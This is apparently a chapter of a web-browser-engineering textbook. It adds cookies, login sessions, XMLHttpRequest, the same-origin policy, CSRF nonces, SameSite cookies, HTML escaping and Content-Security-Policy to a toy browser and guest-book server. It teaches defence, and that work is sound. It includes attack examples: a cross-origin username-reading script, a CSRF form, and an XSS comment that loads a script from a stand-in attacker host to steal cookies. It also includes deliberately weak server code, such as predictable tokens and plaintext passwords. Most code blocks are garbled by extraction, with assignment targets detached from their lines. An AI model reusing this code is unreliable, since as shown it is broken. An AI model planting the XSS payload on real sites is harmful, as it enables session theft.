WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class URL:
def __init__(url)
def request(payload)
def resolve(url)
class Element:
def __init__(tag, attributes, parent)
def __repr__()
class Text:
def __init__(text, parent)
def __repr__()
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
INPUT_WIDTH_PX
EVENT_DISPATCH_CODE
class JSContext:
def __init__(tab)
def run(code)
def dispatch_event(type, elt)
def get_handle(elt)
def querySelectorAll(selector_text)
def getAttribute(handle, attr)
def innerHTML_set(handle, s)
if __name__ == "__main__"
The server’s outline is unchanged from the last chapter:
def handle_connection(conx)
def do_request(method, url, headers, body)
def form_decode(body)
ENTRIES
def show_comments()
def not_found(url, method)
def add_entry(params)
if __name__ == "__main__"
If you run it, it should look something like this page; due to the browser sandbox, you will need to open that page in a new tab.
Node.children: Add support for the children
property on JavaScript Node
s. Node.children
returns the immediate Element
children of a node, as an
array. Text
children are not included.The DOM method
childNodes
gives access to both elements and
text.
createElement: The document.createElement
method creates a new element, which can be attached to the
document with the appendChild
and insertBefore
methods on Node
s; unlike innerHTML
, there’s no
parsing involved. Implement all three methods.
removeChild: The removeChild
method on Node
s detaches the provided child and returns it,
bringing that child—and its subtree—back into an detached
state. (It can then be re-attached elsewhere, with
appendChild
and insertBefore
, or deleted.)
Implement this method. It’s more challenging to implement this one,
because you’ll need to also remove the subtree from the Python side, and
delete any layout objects associated with it.
IDs: When an HTML element has an id
attribute,
a JavaScript variable pointing to that element is predefined. So, if a
page has a <div id="foo"></div>
, then there’s a
variable foo
referring to that node.This is standard
behavior. Implement this in your browser. Make sure to
handle the case of nodes being added and removed (such as with
innerHTML
).
Event Bubbling: Right now, you can attach a
click
handler to a
(anchor) elements, but not
to anything else. Fix this. One challenge you’ll face is that when you
click on an element, you also click on all its ancestors. On the web,
this sort of quirk is handled by event
bubbling: when an event is generated on an element, listeners
are run not just on that element but also on its ancestors. Implement
event bubbling, and make sure listeners can call
stopPropagation
on the event object to stop bubbling the
event up the tree. Double-check that clicking on links still works, and
make sure preventDefault
still successfully prevents clicks
on a link from actually following the link.
Inline styling: The style
property of a
JavaScript Node
object contains a CSSStyleDeclaration
object. Setting any property on this object should add or modify CSS
properties from the element’s inline style (as in its style
attribute). CSS properties with dashes are replaced by camel-casing; the
background-color
CSS property is called
backgroundColor
in Javascript. Implement the
style
property.
Serializing HTML: Reading from innerHTML
should return a string containing HTML source code. That source code
should reflect the current attributes of the element; for
example:
.innerHTML = '<span id=foo>Chris was here</span>';
element.id = 'bar';
element// Prints "<span id=bar>Chris was here</span>":
console.log(element.innerHTML);
Implement this behavior for innerHTML
as a getter. Also
implement outerHTML
, which differs from
innerHTML
in that it contains the element itself, not just
its children.
Script-added scripts and style sheets: The
innerHTML
API could cause <script>
or
<link>
elements to be added to the document, but
currently our browser does not load them when this happens. Fix this.
Likewise, when a <link>
element is removed from the
document, its style sheet should be removed from the global list;
implement that as well.Note that, unlike a style sheet, a removed
<script>
’s evaluated code still exists for the
lifetime of the web page. Can you see why it has to be that
way?
Our browser has grown up and now runs (small) web applications. With one final step—user identity via cookies—it will be able to run all sorts of personalized online services. But capability demands responsibility: our browser must now secure cookies against adversaries interested in stealing them. Luckily, browsers have sophisticated systems for controlling access to cookies and preventing their misuse.
Web security is a vast topic, covering browser, network, and applications security. It also involves educating the user, so that attackers can’t mislead them into revealing their own secure data. This chapter can’t cover all of that: if you’re writing web applications or other security-sensitive code, this book is not enough.
With what we’ve implemented so far there’s no way for a web server to tell whether two HTTP requests come from the same user or from two different ones: our browser is effectively anonymous.I don’t mean anonymous against malicious attackers, who might use browser fingerprinting or similar techniques to tell users apart. I mean anonymous in the good-faith sense. That means it can’t “log in” anywhere, since a logged-in user’s requests would be indistinguishable from those of not-logged-in users.
The web fixes this problem with cookies. A cookie—the name is meaningless, ignore it—is a little bit of information stored by your browser on behalf of a web server. The cookie distinguishes your browser, and is sent with each web request so the server can distinguish which requests come from which user.
Here’s the technical details. In the HTTP response a server can send
a Set-Cookie
header. This header contains a key-value pair;
for example, the following header sets the value of the foo
cookie to bar
:
Set-Cookie: foo=bar
The browser remembers this key-value pair, and the next time it makes
a request to the same server (cookies are site-specific), the browser
echoes it back in the Cookie
header:
Cookie: foo=bar
Servers can also set multiple cookies and also set parameters like
expiration dates, but this Set-Cookie
/ Cookie
mechanism is the core principle.
Servers use cookies to assign identities to their users. Let’s use
cookies to write a login system for our guest book. Each user will be
identified by a long random number stored in the token
cookie.This
random.random
call returns a decimal number with 53 bits of
randomness. That’s not great; 256 bits is ideal. And
random.random
is not a secure random number generator: by
observing enough tokens you can predict future values and use those to
hijack accounts. A real web application must use a cryptographically
secure random number generator for tokens. The server will
either extract a token from the Cookie
header, or generate
a new one for new visitors:
import random
def handle_connection(conx):
# ...
if "cookie" in headers:
= headers["cookie"][len("token="):]
token else:
= str(random.random())[2:]
token # ...
Of course, new visitors need to be told to remember their newly-generated token:
def handle_connection(conx):
# ...
if 'cookie' not in headers:
= "Set-Cookie: token={}\r\n"
template += template.format(token)
response # ...
The first code block runs after all the request headers are parsed,
before handling the request in do_request
, while the second
code block runs after do_request
returns, when the server
is assembling the HTTP response.
With these two code changes, each visitor to the guest book now has a
unique identity. We can now use that identity to store information about
each user. Let’s do that in a server side SESSIONS
variable:Browsers and
servers both limit header lengths, so it’s best to store minimal data in
cookies. Plus, cookies are sent back and forth on every request, so long
cookies mean a lot of useless traffic. It’s therefore wise to store user
data on the server, and only store a pointer to that data in the cookie.
And, since cookies are stored by the browser, they can be changed
arbitrarily by the user, so it would be insecure to trust the cookie
data.
= {}
SESSIONS
def handle_connection(conx):
# ...
= SESSIONS.setdefault(token, {})
session = do_request(session, method, url, headers, body)
status, body # ...
SESSIONS
maps tokens to session data dictionaries. I’m
passing that session data via do_request
to individual
pages like show_comments
and add_entry
:
def do_request(session, method, url, headers, body):
if method == "GET" and url == "/":
return "200 OK", show_comments(session)
# ...
elif method == "POST" and url == "/add":
= form_decode(body)
params
add_entry(session, params)return "200 OK", show_comments(session)
# ...
You’ll need to modify the argument lists for add_entry
and show_comments
to accept this new argument. We now have
the foundation upon which to build a login system.
The original specification for cookies says there is “no compelling reason” for calling them “cookies”, but in fact using this term for opaque identifiers exchanged between programs seems to date way back; Wikipedia traces it back to at least 1979, and cookies were used in X11 for authentication before they were used on the web.
I want users to log in before posting to the guest book. Minimally, that means:
Let’s start coding. First, we’ll need to store usernames in
ENTRIES
:The
pre-loaded comments reference 1995’s Hackers. Hack the Planet!
= [
ENTRIES "No names. We are nameless!", "cerealkiller"),
("HACK THE PLANET!!!", "crashoverride"),
( ]
Each user will also have a password:
= {
LOGINS "crashoverride": "0cool",
"cerealkiller": "emmanuel"
}
When we print the guest book entries, we’ll write who authored them:
def show_comments(session):
# ...
for entry, who in ENTRIES:
+= "<p>" + entry + "\n"
out += "<i>by " + who + "</i></p>"
out # ...
Now, let’s handle logging in. We’ll determine whether a user is
logged in using the user
key in the session data, and use
that to show either the comment form or a login link:
def show_comments(session):
# ...
if "user" in session:
+= "<h1>Hello, " + session["user"] + "</h1>"
out += "<form action=add method=post>"
out += "<p><input name=guest></p>"
out += "<p><button>Sign the book!</button></p>"
out += "</form>"
out else:
+= "<a href=/login>Sign in to write in the guest book</a>"
out # ...
Likewise, add_entry
must check that the user is logged
in before posting comments:
def add_entry(session, params):
if "user" not in session: return
if 'guest' in params and len(params['guest']) <= 100:
'guest'], session["user"])) ENTRIES.append((params[
Note that the username from the session is stored into
ENTRIES
.
Since the session data (including the user
key) is
stored on the server, users can’t modify it directly. That’s good,
because we only want to set the user
key in the session
data if users supply the right password in the login form.
Let’s build that login form. We’ll need a handler for
/login
:
def do_request(session, method, url, headers, body):
# ...
elif method == "GET" and url == "/login":
return "200 OK", login_form(session)
# ...
This URL shows a form with a username and a password field:I’ve given the
password
input area the type password
, which
in a real browser will draw stars or dots instead of showing what you’ve
entered, though our browser doesn’t do that.
def login_form(session):
= "<!doctype html>"
body += "<form action=/ method=post>"
body += "<p>Username: <input name=username></p>"
body += "<p>Password: <input name=password type=password></p>"
body += "<p><button>Log in</button></p>"
body += "</form>"
body return body
Note that the form POST
s its data to the /
URL. We’ll want to handle these POST
requests in a new
function that checks passwords and does logins:
def do_request(session, method, url, headers, body):
# ...
elif method == "POST" and url == "/":
= form_decode(body)
params return do_login(session, params)
# ...
This do_login
function checks passwords and logs people
in by storing their user name in the session data:Actually, using
==
to compare passwords like this is a bad idea: Python’s
equality function for strings scans the string from left to right, and
exits as soon as it finds a difference. Therefore, you get a clue about
the password from how long it takes to check a password guess;
this is called a timing side
channel. This book is about the browser, not the server, but a real
web application has to do a constant-time
string comparison!
def do_login(session, params):
= params.get("username")
username = params.get("password")
password if username in LOGINS and LOGINS[username] == password:
"user"] = username
session[return "200 OK", show_comments(session)
else:
= "<!doctype html>"
out += "<h1>Invalid password for {}</h1>".format(username)
out return "401 Unauthorized", out
Try it out in a normal web browser. You should be able to go to the
main guest book page, click the link to log in, log in with one of the
username/password pairs above, and then be able to post entries.The login flow slows down
debugging. You might want to add the empty string as a username/password
pair. Of course, this login system has a whole slew of
insecurities.The
insecurities include not hashing passwords, not using bcrypt
,
not allowing password changes, not having a “forget your password” flow,
not forcing TLS, not sandboxing the server, and many many
others. But the focus of this book is the browser, not the
server, so once you’re sure it’s all working, let’s switch back to our
web browser and implement cookies.
A more obscure browser authentication system is TLS
client certificates. The user downloads a public/private key pair
from the server, and the browser then uses them to prove who it is on
later requests to that server. Also, if you’ve ever seen a URL with
username:password@
before the hostname, that’s HTTP
authentication. Please don’t use either method in new websites
(without a good reason).
To start, we need a place in the browser that stores cookies; that data structure is traditionally called a cookie jar:Because once you have one silly name it’s important to stay on-brand.
= {} COOKIE_JAR
Since cookies are site-specific, our cookie jar will map sites to cookies. Note that the cookie jar is global, not limited to a particular tab. That means that if you’re logged in to a website and you open a second tab, you’re logged in on that tab as well.
When the browser visits a page, it needs to send the cookie for that site:
class URL:
def request(self, payload=None):
# ...
if self.host in COOKIE_JAR:
= COOKIE_JAR[self.host]
cookie += "Cookie: {}\r\n".format(cookie)
body # ...
Symmetrically, the browser has to update the cookie jar when it sees
a Set-Cookie
header:A server can actually send multiple Set-Cookie
headers to set multiple cookies in one request.
class URL:
def request(self, payload=None):
# ...
if "set-cookie" in headers:
= headers["set-cookie"]
kv self.host] = kv
COOKIE_JAR[# ...
You should now be able to use your toy browser to log in to the guest book and post to it. Moreover, you should be able to open the guest book in two browsers simultaneously—maybe your toy browser and a real browser as well—and log in and post as two different users.
Note that request
can be called multiple times to load a
web page’s HTML, CSS, and JavaScript resources. Later requests transmit
cookies set by previous responses, so for example our guest book sets a
cookie when the browser first requests the page and then receives that
cookie when our browser later requests the page’s CSS file.
Now that our browser supports cookies and uses them for logins, we
need to make sure cookie data is safe from malicious actors. After all:
if someone stole your token
cookie, they could copy it into
their browser, and the server would think they are you. We need to
prevent that.
At one point, an attempt was made to “clean up” the cookie
specification in RFC 2965,
including human-readable cookie descriptions and cookies restricted to
certain ports. This required introducing the Cookie2
and
Set-Cookie2
headers; the new headers were not popular. They
are now obsolete.
Cookies are site-specific, so one server shouldn’t be sent another server’s cookies.Well… Our connection isn’t encrypted, so an attacker could read it from an open Wifi connection. But another server couldn’t.Well… Another server could hijack our DNS and redirect our hostname to a different IP address, and then steal our cookies. Some ISPs support DNSSEC, which prevents this, but not all.Well… A state-level attacker could announce fradulent BGP routes, which would send even a correctly-retrieved IP address to the wrong physical computer.Security is very hard. But if an attacker is clever, they might be able to get the server or the browser to help them steal cookie values.
The easiest way for an attacker to steal your private data is to ask
for it. Of course, there’s no API in the browser for a website to ask
for another website’s cookies. But there is an API to make
requests to another website. It’s called
XMLHttpRequest
.It’s a weird name! Why is XML
capitalized but
not Http
? And it’s not restricted to XML! Ultimately, the
naming is historical,
dating back to Microsoft’s “Outlook Web Access” feature for Exchange
Server 2000.
XMLHttpRequest
sends asynchronous HTTP requests from
JavaScript. Since I’m using XMLHttpRequest
just to
illustrate security issues, I’ll implement a minimal version here.
Specifically, I’ll support only synchronous requests HTTP.Synchronous
XMLHttpRequests
are slowly moving through deprecation and
obsolescence, but I’m using them here because they are easier to
implement. Using this minimal XMLHttpRequest
looks like this:
= new XMLHttpRequest();
x .open("GET", url, false);
x.send();
x// use x.responseText
We’ll define the XMLHttpRequest
objects and methods in
JavaScript. The open
method will just save the method and
URL:XMLHttpRequest
has more options not
implemented here, like support for usernames and passwords. This code is
also missing some error checking, like making sure the method is a valid
HTTP method supported by our browser.
function XMLHttpRequest() {}
XMLHttpRequest.prototype.open = function(method, url, is_async) {
if (is_async) throw Error("Asynchronous XHR is not supported");
this.method = method;
this.url = url;
}
The send
method calls an exported function:As above, this implementation
skips important XMLHttpRequest
features, like setting
request headers (and reading response headers), changing the response
type, or triggering various events and callbacks during the
request.
XMLHttpRequest.prototype.send = function(body) {
this.responseText = call_python("XMLHttpRequest_send",
this.method, this.url, body);
}
The XMLHttpRequest_send
function just calls
request
:Note that the method
argument is ignored,
because our request
function chooses the method on its own
based on whether a payload is passed. This doesn’t match the standard
(which allows POST
requests with no payload), and I’m only
doing it here for convenience.
class JSContext:
def XMLHttpRequest_send(self, method, url, body):
= self.tab.url.resolve(url)
full_url = full_url.request(body)
headers, out return out
With XMLHttpRequest
, a web page can make HTTP requests
in response to user actions, making websites more interactive! This API,
and newer analogs like fetch
,
are how websites allow you to like a post, see hover previews, or
submitting a form without reloading.
XMLHttpRequest
objects have setRequestHeader
and getResponseHeader
method to control HTTP headers. However, this could allow a script to
interfere with the cookie mechanism or with other security measures, so
some request
and response
headers are not accessible from JavaScript.
However, new capabilities lead to new responsibilities. HTTP requests
sent with XMLHttpRequest
include cookies. This is by
design: when you “like” something, the server needs to associate the
“like” to your account. But it also means that
XMLHttpRequest
can access private data, and thus need to
protect it.
Let’s imagine an attacker wants to know your username on our guest book server. When you’re logged in, the guest book includes your username on the page (where it says “Hello, so and so”), so reading the guest book with your cookies is enough to determine your username.
With XMLHttpRequest
, an attacker’s websiteWhy is the user on the
attacker’s site? Perhaps it has funny memes, or it’s been hacked and is
being used for the attack against its will, or perhaps the evil-doer
paid for ads on sketchy websites where users have low standards for
security anyway. could request the guest book page:
= new XMLHttpRequest();
x .open("GET", "http://localhost:8000/", false);
x.send();
x= x.responseText.split(" ")[2].split("<")[0]; user
The issue here is that one server’s web page content is being sent to a script running on a website delivered by another server. Since the content is derived from cookies, this leaks private data.
To prevent issues like this, browsers have a same-origin
policy, which says that requests like
XMLHttpRequest
sSome kinds of requests are not subject to the same-origin
policy (most prominently CSS and JavaScript files linked from a web
page); conversely, the same-origin policy also governs JavaScript
interactions with iframe
s, images,
localStorage
and many other browser features.
can only go to web pages on the same “origin”—scheme, hostname, and
port.You may have
noticed that this is not the same definition of “website” as cookies
use: cookies don’t care about scheme or port! This seems to be an
oversight or incongruity left over from the messy early
web. This way, one website’s private data has to stay on
that website, and cannot be leaked to an attacker on another server.
Let’s implement the same-origin policy for our browser. We’ll need to compare the URL of the request to the URL of the page we are on:
class JSContext:
def XMLHttpRequest_send(self, method, url, body):
# ...
if full_url.origin() != self.tab.url.origin():
raise Exception("Cross-origin XHR request not allowed")
# ...
The origin
function can just strip off the path from a
URL:
class URL:
def origin(self):
return self.scheme + "://" + self.host + ":" + str(self.port)
Now an attacker can’t read the guest book web page. But can they write to it? Actually…
One interesting form of the same-origin policy involves images and
the HTML <canvas>
element. The drawImage
method allows drawing an image to a canvas, even if that image was
loaded from another origin. But to prevent that image from being read
back with getImageData
or related methods, writing cross-origin data to a canvas taints
it, blocking read methods.
The same-origin policy prevents cross-origin
XMLHttpRequest
calls. But the same-origin policy doesn’t
apply to normal browser actions like clicking a link or filling out a
form. This enables an exploit called cross-site request
forgery, often shortened to CSRF.
In cross-site request forgery, instead of using
XMLHttpRequest,
the attacker uses a form that submits to
the guest book:
<form action="http://localhost:8000/add" method=post>
<p><input name=guest></p>
<p><button>Sign the book!</button></p>
</form>
Even though this form is on the evildoer’s website, when you submit the form, the browser will make an HTTP request to the guest book. And that means it will send its guest book cookies, so it will be logged in, so the guest book code will allow a post. But the user has no way of knowing which server a form submits to—the attacker’s web page could have misrepresented that—so they may have posted something they didn’t mean to.Even worse, the form submission could be triggered by JavaScript, with the user not involved at all. And this kind of attack can be further disguised by hiding the entry widget, pre-filling the post, and styling the button to look like a normal link.
Of course, the attacker can’t read the response, so this doesn’t leak private data to the attacker. But it can allow the attacker to act as the user! Posting a comment this way is not too scary (though shady advertisers will pay for it!) but posting a bank transaction is. And if the website has a change-of-password form, there could even be a way to take control of the account.
Unfortunately, we can’t just apply the same-origin policy to form submissions.For example, many search forms on websites submit to Google, because those websites don’t have their own search engines. So how do we defend against this attack?
To start with, there are things the server can do. The usual advice
is to make sure that every POST request to /add
comes from
a form on our website. The way to do that is to embed a secret value,
called a nonce, into the form, and to reject form submissions
that don’t come with the right secret value. You can only get a nonce
from the server, and the nonce is tied to the user session,It’s important that nonces are
associated with the particular user. Otherwise, the attacker can
generate a nonce for themselves and insert it into a form meant
for the user. so the attacker could not embed it
in their form.A nonce is
somewhat like a cookie, except that it’s stored inside the HTML instead
of the browser cookie. Like a cookie, it can be stolen with cross-site
scripting.
To implement this fix, generate a nonce and save it in the user
session when a form is requested:Usually <input type=hidden>
is
invisible, though our browser doesn’t support this.
def show_comments(session):
# ...
if "user" in session:
= str(random.random())[2:]
nonce "nonce"] = nonce
session[# ...
+= "<input name=nonce type=hidden value=" + nonce + ">" out
When a form is submitted, the server checks that the right nonce is submitted with it:In real websites it’s usually best to allow one user to have multiple active nonces, so that a user can open two forms in two tabs without that overwriting the valid nonce. To prevent the nonce set from growing over time, you’d have nonces expire after a while. I’m skipping this here, because it’s not the focus of this chapter.
def add_entry(session, params):
if "nonce" not in session or "nonce" not in params: return
if session["nonce"] != params["nonce"]: return
# ...
Now this form can’t be submitted except from our website. Repeat this nonce fix for each form in the application, and it’ll be secure from CSRF attacks. But server-side solutions are fragile—what if you forget a form—and relying on every website out there to do it right is a pipe dream. It’d be better for the browser to provide a fail-safe backup.
One unusual attack, similar in spirit to cross-site request forgery,
is click-jacking.
In this attack, an external site in a transparent iframe
is
positioned over the attacker’s site. The user thinks they are clicking
around one site, but they actually take actions on a different one.
Nowadays, sites can prevent this with the frame-ancestors
directive to Content-Security-Policy
or the older X-Frame-Options
header.
For form submissions, that fail-safe solution is
SameSite
cookies. The idea is that if a server marks its
cookies SameSite
, the browser will not send them in
cross-site form submissions.At the time of this writing, the SameSite
cookie standard is still in a draft stage, and not all browsers
implement that draft fully. So it’s possible for this section to become
out of date, though some kind of SameSite
cookies will
probably be ratified. The MDN
page is helpful for checking the current status of
SameSite
cookies.
A cookie is marked SameSite
in the
Set-Cookie
header like this:
Set-Cookie: foo=bar; SameSite=Lax
The SameSite
attribute can take the value
Lax
, Strict
, or None
, and as I
write, browsers have and plan different defaults. Our browser will
implement only Lax
and None
, and default to
None
. When SameSite
is set to
Lax
, the cookie is not sent on cross-site POST
requests, but is sent on same-site POST
or cross-site
GET
requests.Cross-site GET
requests are also known as
“clicking a link”, which is why those are allowed in Lax
mode. The Strict
version of SameSite
blocks
these too, but you need to design your web application carefully for
this to work.
First, let’s modify COOKIE_JAR
to store cookie/parameter
pairs, and then parse those parameters out of Set-Cookie
headers:
def request(self, payload=None):
if "set-cookie" in headers:
= {}
params if ";" in headers["set-cookie"]:
= headers["set-cookie"].split(";", 1)
cookie, rest for param_pair in rest.split(";"):
= param_pair.strip().split("=", 1)
name, value = value.lower()
params[name.lower()] else:
= headers["set-cookie"]
cookie self.host] = (cookie, params) COOKIE_JAR[
When sending a cookie in an HTTP request, the browser only sends the cookie value, not the parameters:
def request(self, payload=None):
if self.host in COOKIE_JAR:
= COOKIE_JAR[self.host]
cookie, params += "Cookie: {}\r\n".format(cookie) body
This stores the SameSite
parameter of a cookie. But to
actually use it, we need to know which site an HTTP request is being
made from. Let’s add a new top_level_url
parameter to
request
to track that:
class URL:
def request(self, top_level_url, payload=None):
# ...
Our browser calls request
in three places, and we need
to send the top-level URL in each case. At the top of load
,
it makes the initial request to a page. Modify it like so:
class Tab:
def load(self, url, body=None):
= url.request(self.url, body)
headers, body # ...
Here, url
is the new URL to visit, but
self.url
is the URL of the page where the request comes
from. Make sure this line comes at the top of load
, before
self.url
is changed!
Later, the browser loads styles and scripts with more
request
calls:
class Tab:
def load(self, url, body=None):
# ...
for script in scripts:
# ...
= script_url.request(url)
header, body # ...
# ...
for link in links:
# ...
= style_url.request(url)
header, body # ...
# ...
For these requests the top-level URL is the new URL being loaded. That’s because it is the new page that made us request these particular styles and scripts, so it defines which of those resources are on the same site.
Similarly, XMLHttpRequest
-triggered requests use the tab
URL as their top-level URL:
class JSContext:
def XMLHttpRequest_send(self, method, url, body):
# ...
= full_url.request(self.tab.url, body)
headers, out # ...
The request
function can now check the
top_level_url
argument before sending SameSite
cookies. Remember that SameSite
cookies are only sent for
GET
requests or if the new URL and the top-level URL have
the same host name:At I
write this, some browsers also check that the new URL and the top-level
URL have the same scheme and some browsers ignore subdomains, so that
www.foo.com
and login.foo.com
are considered
the “same site”. If cookies were invented today, they’d probably be
specific to URL origins, much like CSP policies, but alas historical
contingencies and backwards compatibility force rules that are more
complex but easier to deploy.
def request(self, top_level_url, payload=None):
if self.host in COOKIE_JAR:
# ...
= COOKIE_JAR[self.host]
cookie, params = True
allow_cookie if top_level_url and params.get("samesite", "none") == "lax":
if method != "GET":
= self.host == top_level_url.host
allow_cookie if allow_cookie:
+= "Cookie: {}\r\n".format(cookie)
body # ...
Note that we check whether the top_level_url
is set—it
won’t be when we’re loading the first web page in a new tab.
Our guest book can now mark its cookies SameSite
:
def handle_connection(conx):
if 'cookie' not in headers:
= "Set-Cookie: token={}; SameSite=Lax\r\n"
template += template.format(token) response
But don’t remove the nonces we added earlier: SameSite
provides a kind of “defense in depth”, a fail-safe that makes sure that
even if we forgot a nonce somewhere, we’re still secure against CSRF
attacks.
The web was not initially designed around security, which has lead to some awkward patches after the fact. These patches may be ugly, but a dedication to backwards compatibility is a strength of the web, and at least newer APIs can be designed around more consistent policies.
Now other websites can’t misuse our browser’s cookies to read or
write private data. This seems secure! But what about our own
website? With cookies accessible from JavaScript, any scripts run on our
server could, in principle, read the cookie value. This might seem
benign—doesn’t our server only run comment.js
? But in
fact…
A web service needs to defend itself from being misused. Consider the code in our guest book that outputs guest book entries:
+= "<p>" + entry + "\n"
out += "<i>by " + who + "</i></p>" out
Note that entry
can be anything, including anything the
user might stick into our comment form. That includes HTML tags, like a
custom <script>
tag! So, a malicious user could post
this comment:
Hi! <script src="http://my-server/evil.js"></script>
The server would then output this HTML:
<p>Hi! <script src="http://my-server/evil.js"></script>
<i>by crashoverride</i></p>
Every user’s browser would then download and run the
evil.js
script, which can sendA site’s cookies and cookie
parameters are available to scripts running on that site through the document.cookie
API.See
the exercise on Access-Control-Allow-Origin
for more
details on how web servers can opt in to allowing cross-origin
requests. To steal cookies, it’s the attacker’s server that would to opt
in to receiving stolen cookies. Or, in a real browser,
evil.js
could add images or scripts to the page to trigger
additional requests.In our limited browser the attack has to be a little
clunkier, but the evil script still can, for example, replace the whole
page with a link that goes to their site and includes the token value in
the URL. You’ve seen “please click to continue” screens and have clicked
through unthinkingly; your users will too. the cookies to
the attacker. The attacker could then impersonate other users, posting
as them or misusing any other capabilities those users had.
The core problem here is that user comments are supposed to be data, but the browser is interpreting them as code. In web applications, this kind of exploit is usually called cross-site scripting (often written “XSS”), though misinterpreting data as code is a common security issue in all kinds of programs.
The standard fix is to encode the data so that it can’t be
interpreted as code. For example, in HTML, you can write
<
to display a less-than sign.You may have implemented this
in a Chapter 1 exercise.
Python has an html
module for this kind of encoding:
import html
def show_comments(session):
# ...
+= "<p>" + html.escape(entry) + "\n"
out += "<i>by " + html.escape(who) + "</i></p>"
out # ...
This is a good fix, and every application should be careful to do this escaping. But if you forget to encode any text anywhere—that’s a security bug. So browsers provide additional layers of defense.
Since the CSS parser is very permissive,
some HTML pages also parse as valid CSS. This leads to an attack:
include an external HTML page as a style sheet and observe the styling
it applies. A similar
attack involves including external JSON files as scripts. Setting a
Content-Type
header can prevent this sort of attack thanks
to browsers’ Cross-Origin
Read Blocking policy.
One such layer is the Content-Security-Policy
header.
The full specification for this header is quite complex, but in the
simplest case, the header is set to the keyword default-src
followed by a space-separated list of servers:
Content-Security-Policy: default-src http://example.org
This header asks the browser not to load any resources (including
CSS, JavaScript, images, and so on) except from the listed origins. If
our guest book used Content-Security-Policy
, even if an
attacker managed to get a <script>
added to the page,
the browser would refuse to load and run that script.
Let’s implement support for this header. First, we’ll need to extract
and parse the Content-Security-Policy
header:In real browsers
Content-Security-Policy
can also list scheme-generic URLs
and other sources like 'self'
. And there are keywords other
than default-src
, to restrict styles, scripts, and
XMLHttpRequest
s each to their own set of
URLs.
class Tab:
def load(self, url, body=None):
# ...
self.allowed_origins = None
if "content-security-policy" in headers:
= headers["content-security-policy"].split()
csp if len(csp) > 0 and csp[0] == "default-src":
self.allowed_origins = []
for origin in csp[1:]:
self.allowed_origins.append(URL(origin).origin())
# ...
This parsing needs to happen before we request any JavaScript or CSS, because we now need to check whether those requests are allowed:
class Tab:
def load(self, url, body=None):
# ...
for script in scripts:
= url.resolve(script)
script_url if not self.allowed_request(script_url):
print("Blocked script", script, "due to CSP")
continue
# ...
Note that we need to first resolve relative URLs to know if they’re allowed. Add a similar test to the CSS-loading code.
XMLHttpRequest
URLs also need to be checked:Note that when loading styles
and scripts, our browser merely ignores blocked resources, while for
blocked XMLHttpRequest
s it throws an exception. That’s
because exceptions in XMLHttpRequest
calls can be caught
and handled in JavaScript.
class JSContext:
def XMLHttpRequest_send(self, method, url, body):
= self.tab.url.resolve(url)
full_url if not self.tab.allowed_request(full_url):
raise Exception("Cross-origin XHR blocked by CSP")
# ...
The allowed_request
check needs to handle both the case
of no Content-Security-Policy
and the case where there is
one:
class Tab:
def allowed_request(self, url):
return self.allowed_origins == None or \
in self.allowed_origins url.origin()
The guest book can now send a Content-Security-Policy
header:
def handle_connection(conx):
# ...
= "default-src http://localhost:8000"
csp += "Content-Security-Policy: {}\r\n".format(csp)
response # ...
To check that our implementation works, let’s have the guest book request a script from outside the list of allowed servers:
def show_comments(session):
# ...
+= "<script src=https://example.com/evil.js></script>"
out # ...
If you’ve got everything implemented correctly, the browser should
block the evil scriptNeedless to say, example.com
does not actually
host an evil.js
file, and any request to it returns
404 Not Found
. and report so in the
console.
So are we done? Is the guest book totally secure? Uh… no. There’s more—much, much more—to web application security than what’s in this book. And just like the rest of this book, there are many other browser mechanisms that touch on security and privacy. Let’s settle for this fact: the guest book is more secure than before.
On a complicated site, deploying Content-Security-Policy
can accidentally break something. For this reason, browsers can
automatically report Content-Security-Policy
violations to
the server, using the report-to
directive. The Content-Security-Policy-Report-Only
header asks the browser to report violations of the content security
policy without actually blocking the requests.
We’ve added user data, in the form of cookies, to our browser, and immediately had to bear the heavy burden of securing that data and ensuring it was not misused. That involved:
XMLHttpRequest
s with the
same-origin policySameSite
cookiesContent-Security-Policy
.We’ve also seen the more general lesson that every increase in the capabilities of a web browser also leads to an increase in its responsibility to safeguard user data. Security is an ever-present consideration throughout the design of a web browser.
The purpose of this book is to teach the internals of web browsers, not to teach web application security. There’s much more you’d want to do to make this guest book truly secure, let alone what we’d need to do to avoid denial of service attacks or to handle spam and malicious use. Please consult other sources before working on security-critical code.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
